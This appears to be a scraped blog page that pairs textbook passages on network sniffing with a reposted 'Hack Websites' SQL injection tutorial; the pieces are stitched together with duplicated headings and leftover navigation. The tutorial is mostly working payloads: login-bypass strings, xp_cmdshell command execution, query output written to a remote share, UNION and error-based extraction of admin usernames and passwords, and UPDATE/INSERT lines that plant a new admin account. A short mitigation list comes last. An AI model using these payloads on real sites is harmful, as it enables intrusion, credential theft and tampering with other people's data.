Google Search Data

Sniffing: How It Threatens Security

Sniffing data from the network leads to loss of privacy of several kinds of information that
should be private for a computer network to be secure. These kinds of information include the
following:
n Passwords
n Financial account numbers
n Private data
n Low-level protocol information
The following subsections are intended to provide examples of these kinds.
Sniffing Passwords
Perhaps the most common loss of computer privacy is the loss of passwords. Typical users type
a password at least once a day. Data is often thought of as secure because access to it requires a
password. Users usually are very careful about guarding their password by not sharing it with
anyone and not writing it down anywhere.
Passwords are used not only to authenticate users for access to the files they keep in their
private accounts but other passwords are often employed within multilevel secure database
systems. When the user types any of these passwords, the system does not echo them to the
computer screen to ensure that no one will see them. After jealously guarding these passwords
and having the computer system reinforce the notion that they are private, a setup that sends
each character in a password across the network is extremely easy for any Ethernet sniffer to
see. End users do not realize just how easily these passwords can be found by someone using a
simple and common piece of software.
Sniffing Financial Account Numbers
Most users are uneasy about sending financial account numbers, such as credit card numbers
and checking account numbers, over the Internet. This apprehension may be partly because of
the carelessness most retailers display when tearing up or returning carbons of credit card
receipts. The privacy of each user’s credit card numbers is important. Although the Internet is
by no means bulletproof, the most likely location for the loss of privacy to occur is at the
endpoints of the transmission. Presumably, businesses making electronic transactions are as
fastidious about security as those that make paper transactions, so the highest risk probably
comes from the same local network in which the users are typing passwords.
However, much larger potential losses exist for businesses that conduct electronic funds
transfer or electronic document interchange over a computer network. These transactions
involve the transmission of account numbers that a sniffer could pick up; the thief could then
transfer funds into his or her own account or order goods paid for by a corporate account.
Most credit card fraud of this kind involves only a few thousand dollars per incident.
Sniffing Private Data
Loss of privacy is also common in e-mail transactions. Many e-mail messages have been
publicized without the permission of the sender or receiver. Remember the Iran-Contra affair
in which President Reagan’s secretary of defense, Caspar Weinberger, was convicted. A crucial
piece of evidence was backup tapes of PROFS e-mail on a National Security Agency computer.
The e-mail was not intercepted in transit, but in a typical networked system, it could have
been. It is not at all uncommon for e-mail to contain confidential business information or
personal information. Even routine memos can be embarrassing when they fall into the wrong
hands.

Sniffing: How It Threatens Security

Sniffing: How It Is Done

In a shared media network, such as Ethernet, all network interfaces on a network segment have
access to all of the data that travels on the media. Each network interface has a hardware-layer
address that should differ from all hardware-layer addresses of all other network interfaces on
the network. Each network also has at least one broadcast address that corresponds not to an
individual network interface, but to the set of all network interfaces. Normally, a network
interface will only respond to a data frame carrying either its own hardware-layer address in
the frame’s destination field or the “broadcast address” in the destination field. It responds to
these frames by generating a hardware interrupt to the CPU. This interrupt gets the attention
of the operating system, and passes the data in the frame to the operating system for further
processing.
Note The term “broadcast address” is somewhat misleading. When the sender wants to
get the attention of the operating systems of all hosts on the network, he or she uses
the “broadcast address.” Most network interfaces are capable of being put into a
“promiscuous mode.” In promiscuous mode, network interfaces generate a hardware
interrupt to the CPU for every frame they encounter, not just the ones with
their own address or the “broadcast address.” The term “shared media” indicates to
the reader that such networks broadcast all frames—the frames travel on all the
physical media that make up the network.
At times, you may hear network administrators talk about their networking trouble spots—
when they observe failures in a localized area. They will say a particular area of the Ethernet is
busier than other areas of the Ethernet where there are no problems. All of the packets travel
through all parts of the Ethernet segment. Interconnection devices that do not pass all the
frames from one side of the device to the other form the boundaries of a segment. Bridges,
switches, and routers divide segments from each other, but low-level devices that operate on
one bit at a time, such as repeaters and hubs, do not divide segments from each other. If only
low-level devices separate two parts of the network, both are part of a single segment. All
frames traveling in one part of the segment also travel in the other part.
The broadcast nature of shared media networks affects network performance and reliability so
greatly that networking professionals use a network analyzer, or sniffer, to troubleshoot
problems. A sniffer puts a network interface in promiscuous mode so that the sniffer can
monitor each data packet on the network segment. In the hands of an experienced system
administrator, a sniffer is an invaluable aid in determining why a network is behaving (or
misbehaving) the way it is. With an analyzer, you can determine how much of the traffic is due
to which network protocols, which hosts are the source of most of the traffic, and which hosts
are the destination of most of the traffic. You can also examine data traveling between a
particular pair of hosts and categorize it by protocol and store it for later analysis offline. With
a sufficiently powerful CPU, you can also do the analysis in real time.
Most commercial network sniffers are rather expensive, costing thousands of dollars. When
you examine these closely, you notice that they are nothing more than a portable computer
with an Ethernet card and some special software. The only item that differentiates a sniffer
from an ordinary computer is software. It is also easy to download shareware and freeware
sniffing software from the Internet or various bulletin board systems.
The ease of access to sniffing software is great for network administrators because this type of
software helps them become better network troubleshooters. However, the availability of this
software also means that malicious computer users with access to a network can capture all the
data flowing through the network. The sniffer can capture all the data for a short period of
time or selected portions of the data for a fairly long period of time. Eventually, the malicious
user will run out of space to store the data—the network I use often has 1000 packets per
second flowing on it. Just capturing the first 64 bytes

Sniffing: How It Is Done

sniffing

Sniffing is the use of a network interface to receive data not intended for the machine in which
the interface resides. A variety of types of machines need to have this capability. A token-ring
bridge, for example, typically has two network interfaces that normally receive all packets
traveling on the media on one interface and retransmit some, but not all, of these packets on
the other interface. Another example of a device that incorporates sniffing is one typically
marketed as a “network analyzer.” A network analyzer helps network administrators diagnose a
variety of obscure problems that may not be visible on any one particular host. These problems
can involve unusual interactions between more than just one or two machines and sometimes
involve a variety of protocols interacting in strange ways.
Devices that incorporate sniffing are useful and necessary. However, their very existence
implies that a malicious person could use such a device or modify an existing machine to snoop
on network traffic. Sniffing programs could be used to gather passwords, read inter-machine
e-mail, and examine client-server database records in transit. Besides these high-level data, lowlevel
information might be used to mount an active attack on data in another computer
system.

sniffing

Hack Websites (SQL Injection Information)

When a machine has only port 80 opened, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patch his server, we have to turn to web hacking. SQL injection is one of type of web hacking that require nothing but port 80 and it might just work even if the admin is patch-happy. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS.

This article does not introduce anything new, SQL injection has been widely written and used in the wild. We wrote the article because we would like to document some of our pen-test using SQL injection and hope that it may be of some use to others. You may find a trick or two but please check out the "9.0 Where can I get more info?" for people who truly deserve credit for developing many techniques in SQL injection.

1.1 What is SQL Injection?
It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

1.2 What do you need?
Any web browser.

2.0 What you should look for?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:

Everything between the have potential parameters that might be useful (exploit wise).

2.1 What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:

http://duck/index.asp?id=10

3.0 How do you test if it is vulnerable?
Start with a single quote trick. Input something like:

hi' or 1=1--

Into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--

If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:

If luck is on your side, you will get login without any login name or password.

3.1 But why ' or 1=1--?
Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:

http://duck/index.asp?category=food

In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):

v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)

As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:

SELECT * FROM product WHERE PCategory='food'

The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.

Now, assume that we change the URL into something like this:

http://duck/index.asp?category=food' or 1=1--

Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

' or 'a'='a

The SQL query will now become:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

It should return the same result.

Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

4.0 How do I get remote execution with SQL injection?
Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

Try using double quote (") if single quote (') is not working.

The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:

#tcpdump icmp

If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.

5.0 How to get output of my SQL query?
It is possible to use sp_makewebtask to write your query into an HTML:

'; EXEC master..sp_makewebtask "file://10.10.1.3/share/output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

But the target IP must folder "share" sharing for Everyone.

6.0 How to get data from the database using ODBC error message
We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:

http://duck/index.asp?id=10

We will try to UNION the integer '10' with another string from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5

The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".

To get the next table name, we can use the following query:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

We also can search for data using LIKE keyword:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5

The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".

6.1 How to mine all column names of a table?
We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5

Now that we have the first column name, we can use NOT IN () to get the next column name:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5

When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:

http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5

6.2 How to retrieve any data we want?
Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.

Now, let's get the first login_name from the "admin_login" table:

http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
/index.asp, line 5

We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
/index.asp, line 5

We can now login as "neo" with his password "m4trix".

6.3 How to get numeric string value?
There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":

http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--

We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.

To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:

http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--

We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
/index.asp, line 5

Now, you can even login as 'trinity' with the password '31173'.

7.0 How to update/insert data into the database?
When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":

http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--

To INSERT a new record into the database:

http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

We can now login as "neo2" with the password of "newpas5".

8.0 How to avoid SQL Injection?
Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
- Input from users
- Parameters from URL
- Values from cookie

For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.

Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.

Delete stored procedures that you are not using like:

master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask

Google Search Data

Sniffing: How It Threatens Security

Sniffing: How It Threatens Security

Sniffing: How It Is Done

Sniffing: How It Is Done

sniffing

sniffing

Hack Websites (SQL Injection Information)

Blog Archive

Popular Posts

OUR WORLD

Popular Posts

Subscribe To

Blog Archive

Popular Posts

OUR WORLD

Popular Posts